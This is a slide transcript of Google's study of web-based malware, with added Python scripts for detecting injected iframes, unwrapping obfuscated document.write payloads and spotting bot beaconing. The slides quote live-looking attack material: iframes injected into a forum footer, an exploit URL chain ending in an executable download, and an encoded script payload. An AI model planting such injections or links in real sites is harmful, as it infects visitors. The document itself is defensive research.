The Ghost In The Browser (slide transcript; posted 13-Jun-2020)

The Ghost In The Browser: Analysis of Web-based Malware

Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang, Nagendra Modadugu

Google Inc

Google Inc: The Ghost In The Browser

Overview

• Introduction

• Detecting Malicious Pages

• Content Control

• Malware Trends

• Conclusion


Introduction

• Internet essential for everyday life: ecommerce, etc.

• Malware used to steal bank accounts or credit cards

  • underground economy is very profitable

• Internet threats are changing:

  • remote exploitation and firewalls are yesterday

• Browser is a complex computation environment

• Adversaries exploit browser to install malware


Introduction

• To compromise a user's browser, the adversary first compromises a web server that user visits

• Very easy to set up a new site on the Internet

• Very difficult to keep a new site secure

  • insecure infrastructure: PHP, MySQL, Apache

  • insecure web applications: phpBB2, Invision, etc.


Detecting Malicious Websites

• Malicious website automatically installs malware on the visitor's computer

  • usually via exploits in the browser or other software on the client (without user consent)

• Using Google's infrastructure to analyze several billion URLs


Detecting Malicious Websites

[Figure: detection pipeline. A web page repository feeds a MapReduce job that performs heuristical URL extraction; each extracted URL is loaded in a virtual machine running Internet Explorer under an execution-analysis monitor, and the result is written to a malicious page repository.]


Processing Rate

• The VM gets about 300,000 suspicious URLs daily

• About 10,000 to 30,000 are malicious

[Figure: number of URLs processed per day (log scale, 10^0 to 10^6) from 11-01 to 03-21, broken down into Malicious, Inconclusive and Harmless.]


Content Control

• what constitutes the content of a web page?

  • authored content

  • user-contributed content

  • advertising

  • third-party widgets

• ceding control to a 3rd party could be a security risk


Web Server Security

• compromise web server and change content directly

• many vulnerabilities in web applications, in Apache itself, stolen passwords

• templating system


<!-- Copyright Information -->
<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final &copy; 2003 &nbsp;
<a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
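The "heuristical URL extraction" stage of the pipeline and the injected forum footer above both come down to the same question: which references on a page deserve a look in the instrumented VM? The following is an added example (not code from the slides or from Google's system) of that triage step: it parses a constructed page modelled on the defaced footer, flags iframes and scripts that point off-site or are sized to be invisible, and counts inline document.write(unescape(...)) calls. The page URL, the HTML and the injected domain are all placeholders constructed for the example.

```python
"""Heuristic triage of page references before sandbox execution (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample page, modelled on the defaced forum footer in the slides.
# Hosts below are placeholders, not real indicators.
SAMPLE_PAGE_URL = "http://forum.example/index.php"
SAMPLE_HTML = """
<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final &copy; 2003
<a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div>
<iframe src='http://injected-placeholder.example/adv/193/new.php' width=0 height=0></iframe>
<iframe src='http://injected-placeholder.example/adv/new.php?adv=193'></iframe>
<script src='/js/site.js'></script>
<script>document.write(unescape("%3Ciframe%20src%3D..."));</script>
"""


def _is_hidden(attrs):
    """Zero-sized or invisible iframes are a classic sign of an injected loader."""
    w, h = attrs.get("width", ""), attrs.get("height", "")
    style = attrs.get("style", "").replace(" ", "").lower()
    return (w in ("0", "0px") or h in ("0", "0px")
            or "display:none" in style or "visibility:hidden" in style)


class CandidateExtractor(HTMLParser):
    """Collects iframe/script/object/embed references and the reasons they look suspicious."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.candidates = []          # list of (absolute_url, [reasons])
        self.inline_script_flags = 0  # inline document.write(unescape(...)) occurrences
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        if tag not in ("iframe", "script", "object", "embed"):
            return
        src = a.get("src") or a.get("data")
        if not src:
            return
        url = urljoin(self.page_url, src)
        host = urlparse(url).hostname
        reasons = []
        if host and host != self.page_host:
            reasons.append("off-site " + tag)
        if tag == "iframe" and _is_hidden(a):
            reasons.append("hidden iframe")
        self.candidates.append((url, reasons))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for the obfuscation idiom.
        if self._in_script and re.search(r"document\.write\s*\(\s*unescape", data):
            self.inline_script_flags += 1


def extract_suspicious(page_url, html):
    """Return (candidates worth sandboxing, most suspicious first; inline obfuscation count)."""
    parser = CandidateExtractor(page_url)
    parser.feed(html)
    ranked = [(url, reasons) for url, reasons in parser.candidates if reasons]
    ranked.sort(key=lambda c: -len(c[1]))  # stable sort keeps document order within a score
    return ranked, parser.inline_script_flags


if __name__ == "__main__":
    ranked, flags = extract_suspicious(SAMPLE_PAGE_URL, SAMPLE_HTML)
    for url, reasons in ranked:
        print(url, "->", ", ".join(reasons))
    print("inline document.write(unescape) calls:", flags)
```

The same-origin script (/js/site.js) is dropped from the ranked list because nothing about it is anomalous; the two off-site iframes survive, with the zero-sized one ranked first. In a real pipeline the ranked URLs, plus the page itself whenever the inline counter is non-zero, are what get handed to the VM stage.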

Advertising

• by definition means ceding control of content to another party

• web masters have to trust advertisers

• sub-syndication allows delegation of advertising space

• trust is not transitive

[Figure: ad syndication chain spanning the USA and Russia. A popular web site embeds an advertisement; the ad slot is delegated through four ads companies, each inserting its own JavaScript, and the last one issues an HTTP redirect to an exploit server.]


Third-Party Widgets

• to make sites prettier or more useful:

  • calendaring or stats counter

• example: a site found by searching for "praying mantis"

  • linked to a free stats counter in 2002 via JavaScript

  • the JavaScript started to compromise users in 2006

http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe

Malware Trends and Statistics

• Avoiding detection

  • obfuscating the exploit code itself

  • distributing binaries across different domains

  • continuously re-packing the binaries


document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D...3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>
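The snippet above hides its payload by percent-encoding a whole HTML document and handing it to document.write(unescape(...)); attackers often nest several such layers. For analysis you do not need a browser to see what is written: each layer can be peeled statically. The code below is an added example, not part of the slides, that mirrors JavaScript's legacy unescape() (both %XX and %uXXXX forms), unwraps the layers up to a bound, and lists the URLs in the final document. The two-layer sample payload and its placeholder domain are constructed here for the example.

```python
"""Static unwrapping of nested document.write(unescape(...)) layers (added example)."""
import re

# --- constructed sample: two layers of the obfuscation shown in the slides ---
# Innermost document: a hidden iframe pointing at a placeholder host (not a real indicator).
INNER = "<iframe src='http://exploit-placeholder.example/in.php' width=0 height=0></iframe>"


def _pct(s):
    """Percent-encode every byte, the way the obfuscators in the wild do it."""
    return "".join("%%%02X" % b for b in s.encode("latin-1"))


# Layer 2 writes the iframe; layer 1 writes layer 2. Quotes inside are encoded, so the
# outer string literal contains no raw quote characters.
LAYER2 = 'document.write(unescape("%s"));' % _pct(INNER)
SAMPLE_SCRIPT = 'document.write(unescape("%s"));' % _pct("<script>" + LAYER2 + "</script>")

# --- analysis code ---
_ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_WRITE_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)
_URL_RE = re.compile(r"""(?:src|href)\s*=\s*['"]?\s*([^'"\s>]+)""", re.I)


def js_unescape(s):
    """Mirror JavaScript's legacy unescape(): %uXXXX -> UTF-16 unit, %XX -> code point."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def unwrap(script, max_layers=10):
    """Peel document.write(unescape("...")) layers; return (final text, layers peeled).

    max_layers bounds the work so a self-referential or huge sample cannot spin forever."""
    text, layers = script, 0
    while layers < max_layers:
        m = _WRITE_RE.search(text)
        if not m:
            break
        text = js_unescape(m.group(2))
        layers += 1
    return text, layers


def extract_urls(script):
    """Unwrap, then return (sorted unique src/href URLs in the final document, layers peeled)."""
    final, layers = unwrap(script)
    return sorted(set(_URL_RE.findall(final))), layers


if __name__ == "__main__":
    urls, layers = extract_urls(SAMPLE_SCRIPT)
    print("layers peeled:", layers)
    for u in urls:
        print("referenced:", u)
```

This is a static approximation: it only follows the single idiom the slide shows, so a payload that builds its string with arithmetic, string.fromCharCode, or eval would need the execution-analysis monitor from the pipeline instead. The value of the static pass is that it is cheap enough to run over every page before anything is sent to a VM.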


Malware Classifications

[Figure: unique URLs discovered per day (log scale, 1 to 100,000) from 01-11 to 03-21, by classification: Adware, Unknown, Trojan.]

Remotely Linked Exploits

• Exploits are leveraged across many sites

• Popular exploits are linked from over 10,000 URLs

[Figure: two charts over the roughly 200 most-linked exploit URLs (x-axis 0 to 200): the number of URLs linking to each and the number of hosts linking to each, both on a log scale from 1 to 10,000.]


Discussion

• increase of web-based exploitation over time

• installed malware allows for remote control

• observed botnet-like structures:

  • pull-based: frequently checking for new commands

  • observed user agents such as: DDoSBotLoader

  • binary updates can be interpreted as command & control
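Pull-based command polling leaves a characteristic trace at the network edge: the same client fetching the same resource on a fixed timer, often with a user agent no browser would send. The following is an added example, not from the slides, of that detection logic run over a handful of constructed proxy log lines; the log format (timestamp, client, host, path, user agent), the hosts and the timings are all made up for the example, while the DDoSBotLoader user agent string is the one the slides name.

```python
"""Spotting pull-based command polling in web proxy logs (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: "timestamp client host path user-agent" per line.
# Hosts are placeholders; only the DDoSBotLoader user agent is taken from the slides.
SAMPLE_LOG = """\
2007-03-01T10:00:00 10.0.0.7 update-placeholder.example /cmd.php DDoSBotLoader
2007-03-01T10:00:05 10.0.0.7 www.example.org /news.html Mozilla/4.0
2007-03-01T10:05:00 10.0.0.7 update-placeholder.example /cmd.php DDoSBotLoader
2007-03-01T10:10:00 10.0.0.7 update-placeholder.example /cmd.php DDoSBotLoader
2007-03-01T10:15:00 10.0.0.7 update-placeholder.example /cmd.php DDoSBotLoader
2007-03-01T10:20:00 10.0.0.7 update-placeholder.example /cmd.php DDoSBotLoader
2007-03-01T10:03:11 10.0.0.9 www.example.org /index.html Mozilla/4.0
2007-03-01T10:41:52 10.0.0.9 www.example.org /about.html Mozilla/4.0
2007-03-01T11:12:03 10.0.0.9 www.example.org /index.html Mozilla/4.0
"""

BROWSER_UA_PREFIXES = ("Mozilla/", "Opera/")


def parse_log(text):
    """Parse the constructed format into (timestamp, client, host, path, user_agent) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, path, ua = line.split(" ", 4)
        records.append((datetime.fromisoformat(ts), client, host, path, ua))
    return records


def find_beacons(records, min_requests=4, max_cv=0.2):
    """Flag (client, host, user agent) triples that poll on a regular cadence.

    cv is the coefficient of variation (stddev / mean) of the gaps between
    requests: a near-zero cv is a timer firing, not a person clicking."""
    by_key = defaultdict(list)
    for ts, client, host, _path, ua in records:
        by_key[(client, host, ua)].append(ts)
    hits = []
    for (client, host, ua), times in by_key.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append({
                "client": client,
                "host": host,
                "user_agent": ua,
                "interval_s": avg,
                "non_browser_ua": not ua.startswith(BROWSER_UA_PREFIXES),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(hit)
```

The cadence test and the user-agent test are deliberately separate fields in the result: a bot that spoofs a browser user agent still trips the cadence check, and a legitimate updater with an odd user agent can be allow-listed by host without discarding the rest of the logic. The thresholds are starting points; the right min_requests and max_cv depend on how much ordinary periodic traffic (feed readers, software updaters) the environment already has.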


Conclusion

• Web-based malware is a real problem

  • millions of potentially infected users

• Automatic detection of malicious web pages to secure web search results

• Identified four areas of content control

• Observed botnet-like structures
